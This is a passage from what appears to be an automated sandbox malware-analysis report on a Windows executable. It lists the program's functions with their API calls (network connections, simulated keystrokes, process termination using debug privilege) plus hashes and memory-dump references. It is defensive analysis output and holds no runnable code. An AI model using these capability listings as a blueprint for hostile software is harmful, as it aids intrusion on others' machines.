                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00A15287
                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00A15296
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                        • String ID:
                        • API String ID: 3210457359-0
                        • Opcode ID: 02ab91cb57fe9ccae3155ec3a3149e7d6042236f6f6078394b09a84989b313fc
                        • Instruction ID: db5ba6f0589cb32c97052eaba25cf2f1c9744b943db32ad72a189fd6f8817cb8
                        • Opcode Fuzzy Hash: 02ab91cb57fe9ccae3155ec3a3149e7d6042236f6f6078394b09a84989b313fc
                        • Instruction Fuzzy Hash: A8517031E90A08FEEF21AF78CC49BD93B65BB85321F148215F625962E0C7B5A9D0DB41
                        Function 00998B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                        Download Yara Rule
                        APIs
                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 009D6890
                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 009D68A9
                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009D68B9
                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 009D68D1
                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009D68F2
                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00998874,00000000,00000000,00000000,000000FF,00000000), ref: 009D6901
                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009D691E
                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00998874,00000000,00000000,00000000,000000FF,00000000), ref: 009D692D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                        • String ID:
                        • API String ID: 1268354404-0
                        • Opcode ID: 7e50035ac2264b8a6fe50abdfdfadf64083a9ace994e50864abf5ddb6021eab1
                        • Instruction ID: a0e012240574d30e49cf1bd74eae8ddfae508eb7a1c5753e8230d54743f7520e
                        • Opcode Fuzzy Hash: 7e50035ac2264b8a6fe50abdfdfadf64083a9ace994e50864abf5ddb6021eab1
                        • Instruction Fuzzy Hash: 2F518870640209EFDF20CF68CC55BAA7BBAFB58760F14891DF912972A0DB74E991DB40
                        Function 009FC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009FC182
                        • GetLastError.KERNEL32 ref: 009FC195
                        • SetEvent.KERNEL32(?), ref: 009FC1A9
                          • Part of subcall function 009FC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009FC272
                          • Part of subcall function 009FC253: GetLastError.KERNEL32 ref: 009FC322
                          • Part of subcall function 009FC253: SetEvent.KERNEL32(?), ref: 009FC336
                          • Part of subcall function 009FC253: InternetCloseHandle.WININET(00000000), ref: 009FC341
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                        • String ID:
                        • API String ID: 337547030-0
                        • Opcode ID: 1f269a1e94cbcf3a8e7580f2637ccd7cd3bce9a6f6fcbd6cb970b9c17a8b0ceb
                        • Instruction ID: c57ce617caa4b3186952ab91940a701b646d9e6d789d02157dbcf96d84ff3930
                        • Opcode Fuzzy Hash: 1f269a1e94cbcf3a8e7580f2637ccd7cd3bce9a6f6fcbd6cb970b9c17a8b0ceb
                        • Instruction Fuzzy Hash: A6318BB124060DAFDB219FE59E44AF6BBE8FF58320B14C41DFA6682611C730E8159B60
                        Function 009E25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009E3A57
                          • Part of subcall function 009E3A3D: GetCurrentThreadId.KERNEL32 ref: 009E3A5E
                          • Part of subcall function 009E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009E25B3), ref: 009E3A65
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 009E25BD
                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009E25DB
                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 009E25DF
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 009E25E9
                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009E2601
                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 009E2605
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 009E260F
                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009E2623
                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 009E2627
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                        • String ID:
                        • API String ID: 2014098862-0
                        • Opcode ID: 3cddbe7e8ea17db3aac18fdd769a4fce10d956964f69cb2d2be8ecbed717ee7f
                        • Instruction ID: dead46333b6bcbb873092e42e4d06ff1e805c037b1004b2071915f42ca69a5b3
                        • Opcode Fuzzy Hash: 3cddbe7e8ea17db3aac18fdd769a4fce10d956964f69cb2d2be8ecbed717ee7f
                        • Instruction Fuzzy Hash: 4801D8303D0364BBFB10A7A9DC8EF993F59DB8EB21F104011F358AF0D1C9E118458A69
                        Function 009E1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,009E1449,?,?,00000000), ref: 009E180C
                        • HeapAlloc.KERNEL32(00000000,?,009E1449,?,?,00000000), ref: 009E1813
                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009E1449,?,?,00000000), ref: 009E1828
                        • GetCurrentProcess.KERNEL32(?,00000000,?,009E1449,?,?,00000000), ref: 009E1830
                        • DuplicateHandle.KERNEL32(00000000,?,009E1449,?,?,00000000), ref: 009E1833
                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009E1449,?,?,00000000), ref: 009E1843
                        • GetCurrentProcess.KERNEL32(009E1449,00000000,?,009E1449,?,?,00000000), ref: 009E184B
                        • DuplicateHandle.KERNEL32(00000000,?,009E1449,?,?,00000000), ref: 009E184E
                        • CreateThread.KERNEL32(00000000,00000000,009E1874,00000000,00000000,00000000), ref: 009E1868
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                        • String ID:
                        • API String ID: 1957940570-0
                        • Opcode ID: 882c0a994731823158184c5e8e0bf6d12a22ab79834400bdec90254fabcd1650
                        • Instruction ID: 519dc912583f42bd5d2b3638bf07e9561327de0df89a22db476e90b88151b18a
                        • Opcode Fuzzy Hash: 882c0a994731823158184c5e8e0bf6d12a22ab79834400bdec90254fabcd1650
                        • Instruction Fuzzy Hash: 4501BFB52C0344BFE710EBA5DC4DF977B6CEB89B11F008511FA05DB191C6709801CB20
                        Function 00A0A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009ED4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 009ED501
                          • Part of subcall function 009ED4DC: Process32FirstW.KERNEL32(00000000,?), ref: 009ED50F
                          • Part of subcall function 009ED4DC: CloseHandle.KERNEL32(00000000), ref: 009ED5DC
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A0A16D
                        • GetLastError.KERNEL32 ref: 00A0A180
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A0A1B3
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A0A268
                        • GetLastError.KERNEL32(00000000), ref: 00A0A273
                        • CloseHandle.KERNEL32(00000000), ref: 00A0A2C4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                        • String ID: SeDebugPrivilege
                        • API String ID: 2533919879-2896544425
                        • Opcode ID: 3b70ee5650e948a2b94b5a30913474ebe2dbba0b1c591b2c556a4b8e59f906cd
                        • Instruction ID: 44c48c63f344401e66e41aaf9b57a872cae9d1c00f6691159a20061962e81308
                        • Opcode Fuzzy Hash: 3b70ee5650e948a2b94b5a30913474ebe2dbba0b1c591b2c556a4b8e59f906cd
                        • Instruction Fuzzy Hash: B1617C71204342AFD710DF15D494F59BBA1AFA8318F14849CE4668B7E3C772ED45CB92
                        Function 00A13886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A13925
                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00A1393A
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A13954
                        • _wcslen.LIBCMT ref: 00A13999
                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00A139C6
                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A139F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$Window_wcslen
                        • String ID: SysListView32
                        • API String ID: 2147712094-78025650
                        • Opcode ID: b4c4154f136de344c1305c3a60e41dfc296bf45e0892dcc7323565e7e43738ec
                        • Instruction ID: c3764c39f0c2982875077089cb3af6d37ea3d2d2d5b2055503bf9a155f1b1eed
                        • Opcode Fuzzy Hash: b4c4154f136de344c1305c3a60e41dfc296bf45e0892dcc7323565e7e43738ec
                        • Instruction Fuzzy Hash: 2E418172A00219ABEF219F64CC45BEA7BA9FF48350F100526F958E7281D7759E94CB90
                        Function 009EBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009EBCFD
                        • IsMenu.USER32(00000000), ref: 009EBD1D
                        • CreatePopupMenu.USER32 ref: 009EBD53
                        • GetMenuItemCount.USER32(013658A0), ref: 009EBDA4
                        • InsertMenuItemW.USER32(013658A0,?,00000001,00000030), ref: 009EBDCC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                        • String ID: 0$2
                        • API String ID: 93392585-3793063076
                        • Opcode ID: 11f39d49b84b8f5cf9044b8f5eef02bf6496560539bb03a2211eb5e13fe9d43e
                        • Instruction ID: 918febb205383624de96554564321f39ad35ace7c600fe664b46f04c083c3956
                        • Opcode Fuzzy Hash: 11f39d49b84b8f5cf9044b8f5eef02bf6496560539bb03a2211eb5e13fe9d43e
                        • Instruction Fuzzy Hash: C251BEB0A00289ABDF12CFAADC84BAFBBF9BF85324F148119E551972D0D7709D81CB51
                        Function 009EC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                        Download Yara Rule
                        APIs
                        • LoadIconW.USER32(00000000,00007F03), ref: 009EC913
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: IconLoad
                        • String ID: blank$info$question$stop$warning
                        • API String ID: 2457776203-404129466
                        • Opcode ID: f0f1bb452b8ce105a9d2337bcf703dfb356b6b6ea50108f9c557ce6860598d0b
                        • Instruction ID: 6bcb7d90ae21acbd664ee5d54e023ec5058721accfe7e00f53f9a2e9a6b07b03
                        • Opcode Fuzzy Hash: f0f1bb452b8ce105a9d2337bcf703dfb356b6b6ea50108f9c557ce6860598d0b
                        • Instruction Fuzzy Hash: 81118C76689346BEE7029B55DD83DEE379CDF56324B20042AF440A62C3E7F85E0252A9
                        Function 009EED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$LocalTime
                        • String ID:
                        • API String ID: 952045576-0
                        • Opcode ID: 0017f2d240eeed9f9599c06b3120c85055ad8af7a7100d539dff73ff7b82d84f
                        • Instruction ID: e495e61a98cf468978a4fed5ed59fefc4f54fbe69111a412c67e5c30ca79238b
                        • Opcode Fuzzy Hash: 0017f2d240eeed9f9599c06b3120c85055ad8af7a7100d539dff73ff7b82d84f
                        • Instruction Fuzzy Hash: CE419065C10258B5CB11EBF48C8ABCFB7ACAF86710F508466E924E3121EB34E655C7E5
                        Function 0099F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                        Download Yara Rule
                        APIs
                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,009D682C,00000004,00000000,00000000), ref: 0099F953
                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,009D682C,00000004,00000000,00000000), ref: 009DF3D1
                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,009D682C,00000004,00000000,00000000), ref: 009DF454
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ShowWindow
                        • String ID:
                        • API String ID: 1268545403-0
                        • Opcode ID: 0099489d55bba76b9d2ee3b29d5d9425940b73efff9a926a6076dd25d5a16568
                        • Instruction ID: 303dc4624b900ee95acb74ec4b265c758d45527f0aaf024e6bdcde0e2d84ab19
                        • Opcode Fuzzy Hash: 0099489d55bba76b9d2ee3b29d5d9425940b73efff9a926a6076dd25d5a16568
                        • Instruction Fuzzy Hash: 13413B31244640BEDF38DB3DC8B876AFB9AAB56364F14C43DE047D6660D675A881C710
                        Function 00A12D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                        Download Yara Rule
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 00A12D1B
                        • GetDC.USER32(00000000), ref: 00A12D23
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A12D2E
                        • ReleaseDC.USER32(00000000,00000000), ref: 00A12D3A
                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A12D76
                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A12D87
                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A15A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00A12DC2
                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A12DE1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                        • String ID:
                        • API String ID: 3864802216-0
                        • Opcode ID: 3c90fc37c82013648a78ba0ef1b41207026d385957de9f0db1bd3ca2606d397a
                        • Instruction ID: c13b1d909920790b2cbcd601b869dd1a24d5e9881a98fe073374aa5ab57bd9a3
                        • Opcode Fuzzy Hash: 3c90fc37c82013648a78ba0ef1b41207026d385957de9f0db1bd3ca2606d397a
                        • Instruction Fuzzy Hash: 67319C72241214BFEB118F50DC8AFEB3BADEF09761F048055FE089A291C6759C51CBA4
                        Function 009E5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _memcmp
                        • String ID:
                        • API String ID: 2931989736-0
                        • Opcode ID: 3f284848acd6d5310b5028091f6152bc7c540afa2377b4f94ff81c8adade535c
                        • Instruction ID: 443cfc3f9a228f10715c89f2c0e7f6e4beac2da3e456829d1ea05426c51d95e2
                        • Opcode Fuzzy Hash: 3f284848acd6d5310b5028091f6152bc7c540afa2377b4f94ff81c8adade535c
                        • Instruction Fuzzy Hash: 5A21EE71744A89BFDA169A228E92FFB335CBF6178CF450430FD049A581FB65ED1081E5
                        Function 00A04FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID: NULL Pointer assignment$Not an Object type
                        • API String ID: 0-572801152
                        • Opcode ID: 77fcacb557caa95ae716b367ae9b7e48d755cdda2583cd1c717fb7b8b3ff1ff8
                        • Instruction ID: be24ef59bff360109649013a919add53f0d3f86af88ded3927f814239ae59bc9
                        • Opcode Fuzzy Hash: 77fcacb557caa95ae716b367ae9b7e48d755cdda2583cd1c717fb7b8b3ff1ff8
                        • Instruction Fuzzy Hash: 46D1BE75E0060AAFDF10DFA8E891BAEB7B5BF48304F148569E915AB281E370DD41CF90
                        Function 009C1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • GetCPInfo.KERNEL32(?,?), ref: 009C15CE
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 009C1651
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009C16E4
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 009C16FB
                          • Part of subcall function 009B3820: RtlAllocateHeap.NTDLL(00000000,?,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6,?,00981129), ref: 009B3852
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009C1777
                        • __freea.LIBCMT ref: 009C17A2
                        • __freea.LIBCMT ref: 009C17AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                        • String ID:
                        • API String ID: 2829977744-0
                        • Opcode ID: e98fcc8face0766bfa6c1ef069963981935a1ff8e3eef3a3461fd3be8a7a743e
                        • Instruction ID: 6be01a621404a29ad7cdcfc66cf35f5105a4e938ecb14abd9d55cf7a2e069f7d
                        • Opcode Fuzzy Hash: e98fcc8face0766bfa6c1ef069963981935a1ff8e3eef3a3461fd3be8a7a743e
                        • Instruction Fuzzy Hash: DE91B371E002569ADF208EA4C951FEEBBB99F8A310F18465DF805E7182D735CD40CBAA
                        Function 00A04523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
